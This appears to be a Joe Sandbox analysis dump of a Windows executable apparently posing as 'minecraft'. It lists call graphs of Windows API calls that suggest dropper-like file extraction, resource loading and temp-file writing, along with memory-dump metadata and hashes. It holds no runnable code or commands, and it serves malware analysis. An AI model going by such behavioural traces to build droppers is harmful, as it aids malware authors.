SendMessageW wcslen wcslen SendMessageW 9725->9728 9729 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9725->9729 9726 14000bba4 9731 14000bba9 HeapFree 9726->9731 9732 14000bbbb 9726->9732 9727->9726 9784 140012810 TlsGetValue 9727->9784 9728->9729 9733 14000bb48 9729->9733 9731->9732 9734 14000bbd2 9732->9734 9735 14000bbc0 HeapFree 9732->9735 9736 14000bb51 9733->9736 9737 14000bb0a GetMessageW 9733->9737 9739 14000bbd7 HeapFree 9734->9739 9740 140002e9b 9734->9740 9735->9734 9741 14000bb56 DestroyAcceleratorTable 9736->9741 9742 14000bb5f 9736->9742 9737->9736 9738 14000bb20 TranslateAcceleratorW 9737->9738 9738->9733 9743 14000bb34 TranslateMessage DispatchMessageW 9738->9743 9739->9740 9740->8974 9741->9742 9742->9727 9744 14000bb68 wcslen 9742->9744 9743->9733 9745 1400126d0 3 API calls 9744->9745 9746 14000bb77 wcscpy HeapFree 9745->9746 9746->9727 9747->8982 9748->8984 9749->8986 9750->8988 9751->8992 9752->9001 9753->9003 9754->9005 9755->9009 9756->9011 9758 14000be5c 3 API calls 9757->9758 9759 14000b596 9758->9759 9760 14000bf44 7 API calls 9759->9760 9761 14000b5a3 MessageBoxW 9760->9761 9762 14000bf44 7 API calls 9761->9762 9763 14000b5bf 9762->9763 9763->9013 9764->9666 9765->9676 9766->9698 9768 14000b5ea wcslen RtlAllocateHeap 9767->9768 9769 14000b60e 9767->9769 9768->9769 9769->9709 9771 14000b83f 9770->9771 9772 14000be76 GetWindowThreadProcessId GetCurrentProcessId 9770->9772 9773 14000bf44 9771->9773 9772->9771 9774 14000bf57 EnumWindows 9773->9774 9780 14000bfbb 9773->9780 9775 14000bf77 GetCurrentThreadId 9774->9775 9776 14000b84d 9774->9776 9778 14000bf85 9775->9778 9776->9720 9776->9721 9777 14000bfc7 GetCurrentThreadId 9777->9780 9778->9775 9778->9776 9779 14000bf8b SetWindowPos 9778->9779 9779->9778 9780->9776 9780->9777 9781 14000bfdb EnableWindow 9780->9781 9782 14000bff0 SetWindowPos 9780->9782 9785 140011c68 9780->9785 9781->9780 9782->9780 9784->9726 9786 140011c74 HeapFree 9785->9786 9788 14001f820 9786->9788 9789->9020 9790->9023 9792 1400126d0 3 API calls 9791->9792 9793 14000d9eb GetTempPathW LoadLibraryW 9792->9793 9794 14000da13 GetProcAddress 9793->9794 9795 14000da3e 9793->9795 9796 14000da35 FreeLibrary 9794->9796 9797 14000da28 GetLongPathNameW 9794->9797 9824 140012900 TlsGetValue 9795->9824 9796->9795 9797->9796 9799 140001f92 9799->9028 9800->9032 9801->9035 9803 14000ca20 9802->9803 9804 1400126d0 3 API calls 9803->9804 9805 14000ca34 9804->9805 9806 14000ca3b memcpy 9805->9806 9807 140001ff7 9805->9807 9806->9807 9807->9038 9809 14000da74 9808->9809 9810 140002014 9809->9810 9811 14000da92 DeleteFileW 9809->9811 9812 14000da87 SetFileAttributesW 9809->9812 9813 14000d914 9810->9813 9811->9810 9812->9811 9814 14000d924 wcsncpy wcslen 9813->9814 9815 140002020 GetTempFileNameW 9813->9815 9816 14000d98a CreateDirectoryW 9814->9816 9817 14000d95c 9814->9817 9818 1400121c0 GetLastError TlsGetValue SetLastError 9815->9818 9816->9815 9817->9816 9818->9045 9819->9047 9820->9057 9821->9059 9822->9067 9823->9069 9824->9799 9825->9084 9826->9086 9828 14000dc91 SetCurrentDirectoryW 9827->9828 9829 140006901 9827->9829 9828->9829 9829->9098 9830->9177 9831->9210 9832->9119 9833->9128 9834->9120 9835->9127 9836->9144 9838 1400126d0 3 API calls 9837->9838 9839 14000db3e 9838->9839 9840 14000db4a LoadLibraryW 9839->9840 9846 14000dbfb 9839->9846 9841 14000dbd5 9840->9841 9842 14000db5f GetProcAddress 9840->9842 9892 14000dca4 SHGetFolderLocation 9841->9892 9843 14000dbc4 FreeLibrary 9842->9843 9844 14000db7b 9842->9844 9843->9841 9847 14000dc61 9843->9847 9844->9843 9851 14000db92 wcscpy wcscat wcslen CoTaskMemFree 9844->9851 9846->9847 9849 14000dca4 4 API calls 9846->9849 9898 140012900 TlsGetValue 9847->9898 9849->9847 9851->9843 9852 140004aff 9852->9164 9853->9133 9854->9150 9855->9138 9856->9155 9857->9151 9858->9170 9859->9156 9860->9176 9861->9171 9862->9183 9863->9178 9864->9197 9865->9184 9866->9202 9867->9198 9868->9212 9870 14000bce1 memset LoadLibraryW 9869->9870 9871 14000bccf CoInitialize 9869->9871 9872 14000be22 9870->9872 9873 14000bd12 GetProcAddress GetProcAddress wcsncpy wcslen 9870->9873 9871->9870 9875 1400126d0 3 API calls 9872->9875 9874 14000bd73 9873->9874 9877 14000be5c 3 API calls 9874->9877 9876 14000be2c 9875->9876 9899 140012900 TlsGetValue 9876->9899 9878 14000bd8b 9877->9878 9879 14000bf44 7 API calls 9878->9879 9881 14000bdb8 9879->9881 9883 14000bf44 7 API calls 9881->9883 9882 140004dd7 9882->9221 9884 14000bdca 9883->9884 9885 14000be15 FreeLibrary 9884->9885 9886 1400126d0 3 API calls 9884->9886 9885->9872 9885->9876 9887 14000bddc CoTaskMemFree wcslen 9886->9887 9887->9885 9889 14000be10 9887->9889 9889->9885 9890->9199 9891->9207 9893 14000dbe2 wcscat wcslen 9892->9893 9894 14000dcd7 SHGetPathFromIDListW 9892->9894 9893->9847 9895 14000dce9 wcslen 9894->9895 9896 14000dd0a CoTaskMemFree 9894->9896 9895->9896 9897 14000dcf8 9895->9897 9896->9893 9897->9896 9898->9852 9899->9882 9900->9240 9901->9242 9902->9248 9903->9252 9904->9269 9905->9271 9906->9293 9907->9301 9908->9280 9909->9285 9911 1400031fe 9910->9911 9911->9911 9912 1400123e0 21 API calls 9911->9912 9931 140003218 9912->9931 9913 1400032ff 9974 1400121c0 GetLastError TlsGetValue SetLastError 9913->9974 9915 140003309 9975 1400121c0 GetLastError TlsGetValue SetLastError 9915->9975 9917 14000331d GetCommandLineW 9919 14000ca00 4 API calls 9917->9919 9918 140007c90 3 API calls 9918->9931 9920 140003343 9919->9920 9922 140012210 3 API calls 9920->9922 9921 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9921->9931 9923 140003352 9922->9923 9976 1400121c0 GetLastError TlsGetValue SetLastError 9923->9976 9924 1400121c0 GetLastError TlsGetValue SetLastError 9924->9931 9926 140003361 9927 140012450 4 API calls 9926->9927 9928 140003370 9927->9928 9930 140012210 3 API calls 9928->9930 9929 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 9929->9931 9932 14000337f PathRemoveArgsW 9930->9932 9931->9913 9931->9918 9931->9921 9931->9924 9931->9929 9933 14000339d 9932->9933 9934 140003464 9933->9934 9977 1400121c0 GetLastError TlsGetValue SetLastError 9933->9977 9935 14000c45c SetEnvironmentVariableW 9934->9935 9938 140003473 9935->9938 9937 1400033ba 9939 140012450 4 API calls 9937->9939 9993 1400121c0 GetLastError TlsGetValue SetLastError 9938->9993 9941 1400033d3 9939->9941 9978 1400121c0 GetLastError TlsGetValue SetLastError 9941->9978 9942 140003482 9944 140012450 4 API calls 9942->9944 9946 140003491 9944->9946 9945 1400033e1 9979 1400121c0 GetLastError TlsGetValue SetLastError 9945->9979 9994 1400125a0 TlsGetValue 9946->9994 9949 1400033f1 9980 1400121c0 GetLastError TlsGetValue SetLastError 9949->9980 9950 14000349c 9952 140012360 HeapFree 9950->9952 9954 1400034bb 9952->9954 9953 140003401 9981 1400121c0 GetLastError TlsGetValue SetLastError 9953->9981 9956 140012360 HeapFree 9954->9956 9958 1400034cd 9956->9958 9957 140003411 9982 140008010 9957->9982 9960 140012360 HeapFree 9958->9960 9962 1400034df 9960->9962 9964 140012360 HeapFree 9962->9964 9966 1400034f1 9964->9966 9965 140003441 9967 140007ef0 5 API calls 9965->9967 9969 140012360 HeapFree 9966->9969 9968 140003454 9967->9968 9970 140012210 3 API calls 9968->9970 9971 140002759 9969->9971 9970->9934 9971->9290 9972->9296 9973->9281 9974->9915 9975->9917 9976->9926 9977->9937 9978->9945 9979->9949 9980->9953 9981->9957 9983 140008018 9982->9983 9983->9983 9984 140012630 TlsGetValue 9983->9984 9985 140008082 9984->9985 9986 1400126d0 3 API calls 9985->9986 9987 14000808e 9986->9987 9990 14000809e 9987->9990 9995 140012850 TlsGetValue 9987->9995 9996 140012900 TlsGetValue 9990->9996 9991 140003437 9992 1400125d0 TlsGetValue 9991->9992 9992->9965 9993->9942 9994->9950 9995->9990 9996->9991 9997->9317 9998->9319 9999->9322 10000->9325 10001->9330 10002->9337 10003->9339 10004->9341 10005->9343 10006->9347 10007->9353 10008->9355 10009->9357 10010->9359 10011->9363 10012->9369 10013->9371 10014->9373 10015->9375 10016->9379 10017->9385 10018->9387 10019->9389 10020->9391 10021->9395 10022->9401 10023->9403 10025 1400123e0 21 API calls 10024->10025 10026 1400057b1 10025->10026 10027 1400122f0 2 API calls 10026->10027 10028 1400057d1 FindResourceW 10027->10028 10029 1400057fe 10028->10029 10056 1400058cc 10028->10056 10031 14000350f 21 API calls 10029->10031 10033 14000580f 10031->10033 10032 1400058e5 10034 140012450 4 API calls 10032->10034 10097 140001284 10033->10097 10035 1400058f4 10034->10035 10145 1400125a0 TlsGetValue 10035->10145 10039 140005853 10117 140006960 10039->10117 10040 14000587b 10132 1400121c0 GetLastError TlsGetValue SetLastError 10040->10132 10043 140012360 HeapFree 10045 14000591e 10043->10045 10044 140005885 10133 1400121c0 GetLastError TlsGetValue SetLastError 10044->10133 10047 140012360 HeapFree 10045->10047 10049 140005930 10047->10049 10048 140005899 10134 14000cb60 10048->10134 10049->9405 10050 14000586c 10146 140012600 TlsGetValue 10050->10146 10054 1400058ff 10054->10043 10055 140012210 3 API calls 10055->10056 10144 1400121c0 GetLastError TlsGetValue SetLastError 10056->10144 10057->9407 10058->9409 10059->9415 10060->9417 10061->9423 10062->9425 10063->9431 10064->9433 10065->9439 10066->9441 10067->9443 10068->9445 10069->9449 10070->9451 10209 140008260 10071->10209 10074->9457 10075->9459 10076->9461 10077->9463 10078->9467 10079->9469 10080->9475 10081->9477 10082->9489 10083->9491 10085 1400122f0 2 API calls 10084->10085 10086 1400030c5 10085->10086 10087 1400122f0 2 API calls 10086->10087 10088 1400030dc 10087->10088 10091 140003122 10088->10091 10238 14000e500 10088->10238 10093 140012360 HeapFree 10091->10093 10092 14000dd30 7 API calls 10092->10091 10094 140003156 10093->10094 10095 140012360 HeapFree 10094->10095 10096 140003168 10095->10096 10096->9493 10098 14000129f 10097->10098 10098->10098 10099 1400122f0 2 API calls 10098->10099 10100 1400012ca 10099->10100 10147 1400073a0 WideCharToMultiByte 10100->10147 10102 1400012d8 10103 140011d30 4 API calls 10102->10103 10104 14000131b 10103->10104 10105 140011d30 4 API calls 10104->10105 10106 14000134f 10105->10106 10107 140011d30 4 API calls 10106->10107 10108 140001699 10107->10108 10109 140011d30 4 API calls 10108->10109 10110 1400016cd 10109->10110 10111 140012360 HeapFree 10110->10111 10112 1400016ff 10111->10112 10113 140011ef4 2 API calls 10112->10113 10114 140001711 10113->10114 10115 140011ef4 2 API calls 10114->10115 10116 140001723 10115->10116 10116->10039 10116->10040 10118 1400123e0 21 API calls 10117->10118 10119 140006982 10118->10119 10120 1400122f0 2 API calls 10119->10120 10121 140006995 10120->10121 10123 1400069b0 10121->10123 10151 140003174 10121->10151 10131 1400069c6 10123->10131 10158 14000e0a0 10123->10158 10125 140012360 HeapFree 10127 140006a4c 10125->10127 10126 1400069d8 10128 140006a04 10126->10128 10126->10131 10166 14000e590 10126->10166 10127->10050 10175 14000dd30 10128->10175 10131->10125 10132->10044 10133->10048 10135 14000cb92 10134->10135 10139 14000cbea 10134->10139 10136 1400126d0 3 API calls 10135->10136 10137 14000cbb4 10136->10137 10208 140012900 TlsGetValue 10137->10208 10138 14000cc44 MultiByteToWideChar 10142 1400126d0 3 API calls 10138->10142 10139->10138 10141 1400058bd 10141->10055 10143 14000cc6a MultiByteToWideChar 10142->10143 10143->10141 10144->10032 10145->10054 10146->10054 10148 1400073f2 10147->10148 10149 140007424 10148->10149 10150 1400073fa WideCharToMultiByte 10148->10150 10149->10102 10150->10149 10152 1400122f0 2 API calls 10151->10152 10153 140003197 10152->10153 10154 14000dd30 7 API calls 10153->10154 10155 1400031c9 10153->10155 10154->10155 10156 140012360 HeapFree 10155->10156 10157 1400031eb 10156->10157 10157->10123 10188 1400112a8 RtlEnterCriticalSection 10158->10188 10160 14000e0cc 10161 14000e0d8 CreateFileW 10160->10161 10162 14000e165 10160->10162 10163 14000e13d 10161->10163 10164 14000e10f CreateFileW 10161->10164 10162->10126 10163->10162 10165 14000e14d RtlAllocateHeap 10163->10165 10164->10162 10164->10163 10165->10162 10167 14000e604 10166->10167 10168 14000e5b0 10166->10168 10167->10128 10168->10167 10199 140011248 RtlEnterCriticalSection 10168->10199 10171 14000e5f1 WriteFile 10171->10167 10172 14000e5d5 10173 14000e620 5 API calls 10172->10173 10174 14000e5dd 10173->10174 10174->10128 10176 14000dd3f 10175->10176 10177 14000dd50 10175->10177 10180 140011a81 10176->10180 10203 140011c48 RtlEnterCriticalSection 10176->10203 10178 140011248 2 API calls 10177->10178 10179 14000dd64 10178->10179 10181 14000dda6 10179->10181 10183 14000dd8e CloseHandle 10179->10183 10184 14000ddc0 WriteFile 10179->10184 10180->10131 10181->10131 10183->10181 10185 14000dd7b HeapFree 10184->10185 10185->10183 10187 140011a65 10187->10180 10204 140011bdc 10187->10204 10189 1400112e3 10188->10189 10190 1400112d0 10188->10190 10192 140011312 10189->10192 10193 1400112e9 RtlReAllocateHeap 10189->10193 10197 140011cb0 RtlAllocateHeap 10190->10197 10194 14001132d RtlAllocateHeap 10192->10194 10195 1400112de RtlLeaveCriticalSection 10192->10195 10193->10192 10194->10195 10195->10160 10198 140011cd3 10197->10198 10198->10195 10200 14001127a RtlLeaveCriticalSection 10199->10200 10201 14001126c 10199->10201 10202 14000e5c4 10200->10202 10201->10200 10202->10167 10202->10171 10202->10172 10203->10187 10206 140011be7 10204->10206 10205 140011c3c 10205->10187 10206->10205 10207 140011c32 RtlLeaveCriticalSection 10206->10207 10207->10205 10208->10141 10210 1400082e4 10209->10210 10211 140008397 10210->10211 10220 14000830a 10210->10220 10212 140012630 TlsGetValue 10211->10212 10213 14000839f 10212->10213 10214 1400083ba 10213->10214 10215 1400083aa _wcsdup 10213->10215 10216 140012630 TlsGetValue 10214->10216 10215->10214 10217 1400083c2 10216->10217 10218 1400083d8 10217->10218 10219 1400083cd _wcsdup 10217->10219 10221 140012630 TlsGetValue 10218->10221 10219->10218 10223 140008363 wcsncpy 10220->10223 10225 140005477 10220->10225 10222 1400083e0 10221->10222 10224 1400083eb _wcsdup 10222->10224 10228 1400083f8 10222->10228 10223->10220 10224->10228 10225->9454 10226 1400126d0 3 API calls 10227 140008481 10226->10227 10229 1400084ed wcsncpy 10227->10229 10230 140008488 10227->10230 10231 14000850e 10227->10231 10228->10226 10229->10231 10232 140008575 10230->10232 10233 14000856d free 10230->10233 10231->10230 10237 1400085c0 wcsncpy 10231->10237 10234 140008587 10232->10234 10235 14000857f free 10232->10235 10233->10232 10234->10225 10236 140008591 free 10234->10236 10235->10234 10236->10225 10237->10231 10239 140011248 2 API calls 10238->10239 10240 140003113 10239->10240 10240->10092 10241->9537 10268->9587 10269->9591 10270->9586 10271->9590 10272->9594 10273->9598 10274->9602 10275->9625 10276->9627 10277->9633 10278->9635 10280 1400035a1 10279->10280 10280->10280 10281 1400123e0 21 API calls 10280->10281 10282 1400035bb 10281->10282 10283 1400122f0 2 API calls 10282->10283 10284 1400035d1 10283->10284 10331 140001735 10284->10331 10286 140003bd0 10381 1400121c0 GetLastError TlsGetValue SetLastError 10286->10381 10288 140003be4 10382 1400121c0 GetLastError TlsGetValue SetLastError 10288->10382 10290 140003bf8 10383 1400121c0 GetLastError TlsGetValue SetLastError 10290->10383 10292 140003c0c 10293 140010ba0 6 API calls 10305 1400035da 10293->10305 10297 1400125d0 TlsGetValue 10297->10305 10300 140007dc0 6 API calls 10300->10305 10305->10286 10305->10293 10305->10297 10305->10300 10307 140007ce0 5 API calls 10305->10307 10310 140012210 3 API calls 10305->10310 10316 14000350f 21 API calls 10305->10316 10319 140001284 8 API calls 10305->10319 10320 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 10305->10320 10321 140006960 44 API calls 10305->10321 10322 140003174 10 API calls 10305->10322 10323 1400121c0 GetLastError TlsGetValue SetLastError 10305->10323 10324 14000d9ac SetFileAttributesW 10305->10324 10325 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 10305->10325 10326 140003cc9 37 API calls 10305->10326 10329 14000c45c SetEnvironmentVariableW 10305->10329 10372 140012520 TlsGetValue 10305->10372 10373 140008110 10305->10373 10376 14000d6a0 10305->10376 10307->10305 10312 1400036d7 FindResourceW FindResourceW 10310->10312 10312->10305 10316->10305 10319->10305 10320->10305 10321->10305 10322->10305 10323->10305 10324->10305 10325->10305 10326->10305 10329->10305 10332 14000173f 10331->10332 10332->10332 10333 1400123e0 21 API calls 10332->10333 10334 140001759 10333->10334 10335 14000176a 10334->10335 10371 140001956 10334->10371 10336 140001951 10335->10336 10340 1400018d9 10335->10340 10345 1400121c0 GetLastError TlsGetValue SetLastError 10335->10345 10350 1400074e0 9 API calls 10335->10350 10354 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 10335->10354 10356 140003174 10 API calls 10335->10356 10359 140003cc9 37 API calls 10335->10359 10365 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 10335->10365 10337 140012360 HeapFree 10336->10337 10338 140001dfc 10337->10338 10339 140012360 HeapFree 10338->10339 10341 140001e11 10339->10341 10342 1400073a0 2 API calls 10340->10342 10343 140012360 HeapFree 10341->10343 10344 1400018e3 10342->10344 10346 140001e23 10343->10346 10347 14000190c WriteFile 10344->10347 10345->10335 10348 140012360 HeapFree 10346->10348 10349 14000193b 10347->10349 10351 140001e35 10348->10351 10353 1400120d0 3 API calls 10349->10353 10350->10335 10352 140012360 HeapFree 10351->10352 10355 140001e47 10352->10355 10353->10336 10354->10335 10355->10305 10356->10335 10357 1400121c0 GetLastError TlsGetValue SetLastError 10357->10371 10359->10335 10362 1400074e0 9 API calls 10362->10371 10363 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 10363->10371 10364 1400124c0 wcscmp 10364->10371 10365->10335 10366 1400079d0 10 API calls 10366->10371 10367 14000d914 3 API calls 10367->10371 10370 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 10370->10371 10371->10336 10371->10357 10371->10362 10371->10363 10371->10364 10371->10366 10371->10367 10371->10370 10386 140007920 10371->10386 10394 140012520 TlsGetValue 10371->10394 10395 140012550 TlsGetValue 10371->10395 10396 14000d9ac 10371->10396 10399 1400056b4 10371->10399 10372->10305 10374 1400126d0 3 API calls 10373->10374 10375 14000812e 10374->10375 10377 14001147c 4 API calls 10376->10377 10378 14000d6b6 10377->10378 10379 14000d6c2 memset 10378->10379 10380 14000d6d6 10378->10380 10379->10380 10380->10305 10381->10288 10382->10290 10383->10292 10387 14000794b 10386->10387 10388 140012630 TlsGetValue 10387->10388 10389 140007968 10388->10389 10390 1400126d0 3 API calls 10389->10390 10391 140007975 10390->10391 10393 140007985 10391->10393 10418 140012850 TlsGetValue 10391->10418 10393->10371 10394->10371 10395->10371 10397 14000d9b7 SetFileAttributesW 10396->10397 10398 14000d9bd 10396->10398 10397->10398 10398->10371 10400 1400123e0 21 API calls 10399->10400 10401 1400056ca 10400->10401 10402 1400122f0 2 API calls 10401->10402 10403 1400056dd 10402->10403 10419 14000cdfc 10403->10419 10406 140012360 HeapFree 10408 140005787 10406->10408 10407 14000cdfc 11 API calls 10409 140005710 10407->10409 10408->10371 10410 14000d6a0 5 API calls 10409->10410 10411 140005727 10410->10411 10424 1400121c0 GetLastError TlsGetValue SetLastError 10411->10424 10413 140005736 10414 140012450 4 API calls 10413->10414 10415 140005745 10414->10415 10417 14000575a 10417->10406 10418->10393 10425 14000cf74 10419->10425 10421 14000ce11 10422 1400056f2 10421->10422 10431 14000d02c 10421->10431 10422->10407 10422->10417 10424->10413 10426 14000cfa2 10425->10426 10428 14000cfe2 10425->10428 10446 14000d3a4 10426->10446 10429 14000cfa7 10428->10429 10430 14000cff8 wcscmp 10428->10430 10429->10421 10430->10428 10430->10429 10432 14000d04c 10431->10432 10434 14000d073 10431->10434 10433 14000cf74 2 API calls 10432->10433 10435 14000d051 10433->10435 10436 14000d3a4 tolower 10434->10436 10438 14000d08f 10434->10438 10435->10434 10437 14000d059 10435->10437 10436->10438 10440 14000d06e 10437->10440 10444 140016bb0 HeapFree 10437->10444 10450 14001147c 10438->10450 10442 14000d11c 10440->10442 10443 14000d108 memset 10440->10443 10442->10422 10443->10442 10444->10440 10445 14000d0ae wcslen RtlAllocateHeap wcscpy 10445->10440 10447 14000d3c7 tolower 10446->10447 10448 14000d3b8 10447->10448 10449 14000d3d0 10447->10449 10448->10447 10449->10429 10451 14001149a RtlEnterCriticalSection 10450->10451 10452 1400114a4 10450->10452 10451->10452 10453 14001155e RtlAllocateHeap 10452->10453 10457 1400114b1 10452->10457 10454 140011586 RtlAllocateHeap 10453->10454 10453->10457 10454->10457 10455 14000d0a6 10455->10442 10455->10445 10456 1400115fc RtlLeaveCriticalSection 10456->10455 10457->10455 10457->10456 10458->8506 10459->8508 10460->8510 10461->8512 10462->8516 10463->8522 10464->8524 10465->8526 10466->8528 10467->8532 10468->8540 10469->8542 10470->8546 10471->8548 10472->8557 10473->8559 10474->8561 10475->8563 10476->8567 10477->8573 10478->8575 10479->8577 10480->8579 10481->8583 10482->8589 10483->8591 10484->8597 10485->8599 10486->8605 10487->8607 10488->8613 10489->8617 10542 140007a00 10545 140007a50 10542->10545 10546 140007a79 10545->10546 10547 140012630 TlsGetValue 10546->10547 10548 140007a92 10547->10548 10549 140012630 TlsGetValue 10548->10549 10550 140007a9c 10549->10550 10551 1400126d0 3 API calls 10550->10551 10552 140007ab1 10551->10552 10553 140007abf 10552->10553 10567 140012850 TlsGetValue 10552->10567 10559 140007acf 10553->10559 10568 140012850 TlsGetValue 10553->10568 10556 140007c35 10569 140012900 TlsGetValue 10556->10569 10558 140007a1c 10559->10556 10560 140007b20 RtlAllocateHeap 10559->10560 10561 140007b50 10559->10561 10560->10561 10561->10561 10562 140007b91 wcsncpy 10561->10562 10565 140007bac 10561->10565 10562->10565 10563 140007c02 10563->10556 10564 140007c09 HeapFree 10563->10564 10564->10556 10565->10563 10566 140007bdf wcsncpy 10565->10566 10566->10563 10567->10553 10568->10559 10569->10558 10857 1400040ac 10858 1400123e0 21 API calls 10857->10858 10859 1400040ce 10858->10859 10860 14000d6a0 5 API calls 10859->10860 10861 1400040da 10860->10861 10870 1400121c0 GetLastError TlsGetValue SetLastError 10861->10870 10863 1400040e4 10871 1400121c0 GetLastError TlsGetValue SetLastError 10863->10871 10865 1400040f8 10866 14000ca00 4 API calls 10865->10866 10867 14000410d 10866->10867 10868 140012210 3 API calls 10867->10868 10869 140004122 10868->10869 10870->10863 10871->10865 10508 14000c6b0 10509 14000c6d1 10508->10509 10510 14000c6c0 RtlRemoveVectoredExceptionHandler 10508->10510 10510->10509 10490 14000de50 10491 1400112a8 5 API calls 10490->10491 10492 14000de98 10491->10492 10493 14000deb6 10492->10493 10494 14000defb 10492->10494 10501 14000e04d 10492->10501 10495 14000dec9 10493->10495 10496 14000decd CreateFileW 10493->10496 10497 14000df42 10494->10497 10498 14000df00 10494->10498 10495->10496 10505 14000dfb7 10496->10505 10502 14000df5f CreateFileW 10497->10502 10497->10505 10499 14000df13 10498->10499 10500 14000df17 CreateFileW 10498->10500 10499->10500 10500->10505 10503 14000df8d CreateFileW 10502->10503 10502->10505 10503->10505 10504 14000dff9 10504->10501 10507 14000e036 SetFilePointer 10504->10507 10505->10501 10505->10504 10506 14000dfe1 RtlAllocateHeap 10505->10506 10506->10504 10507->10501 10705 140002853 10706 1400123e0 21 API calls 10705->10706 10707 140002861 10706->10707 10726 1400121c0 GetLastError TlsGetValue SetLastError 10707->10726 10709 14000286b 10727 1400121c0 GetLastError TlsGetValue SetLastError 10709->10727 10711 140002889 10712 140012450 4 API calls 10711->10712 10713 140002898 10712->10713 10728 1400121c0 GetLastError TlsGetValue SetLastError 10713->10728 10715 1400028a6 10729 1400121c0 GetLastError TlsGetValue SetLastError 10715->10729 10717 1400028ba 10730 14000c8e0 10717->10730 10721 1400028d4 10735 1400125d0 TlsGetValue 10721->10735 10723 1400028e5 10724 14000b574 11 API calls 10723->10724 10725 1400028fb 10724->10725 10726->10709 10727->10711 10728->10715 10729->10717 10731 14000c8f0 10730->10731 10732 1400126d0 3 API calls 10731->10732 10733 1400028ca 10732->10733 10734 140012520 TlsGetValue 10733->10734 10734->10721 10735->10723

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
    • String ID: GetLongPathNameW$Kernel32.DLL
    • API String ID: 1993255246-2943376620
    • Opcode ID: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
    • Instruction ID: 230e630dded4efaa915c31c3904b5b857ecb3aa047886c8d585020238d201ac5
    • Opcode Fuzzy Hash: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
    • Instruction Fuzzy Hash: 74116D3171074086EF159F27A9443A967A5FB8CFC0F481029FF4E4B7A5DE39C4518340
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: ExceptionHandlerVectored$Remove
    • String ID:
    • API String ID: 3670940754-0
    • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
    • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
    • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
    • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
    • String ID:
    • API String ID: 2673290768-0
    • Opcode ID: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
    • Instruction ID: 0ebcb89b5f496a055c7edd3f2936d7e00332f328880e18a7a0f049a68aa3c175
    • Opcode Fuzzy Hash: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
    • Instruction Fuzzy Hash: 0641E172201B409AEB129F62E8447A977A0F78CBD5F484129EB4D0B774DF39C999D740

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: File$NameTemp$Heap$AllocateErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememcpywcslenwcsncpy
    • String ID:
    • API String ID: 1881527299-0
    • Opcode ID: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
    • Instruction ID: 77aa1fd205ec2d48eabb088ee49ef1dd4fb6b524f1726a3c9e39dbd98a5b5f3b
    • Opcode Fuzzy Hash: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
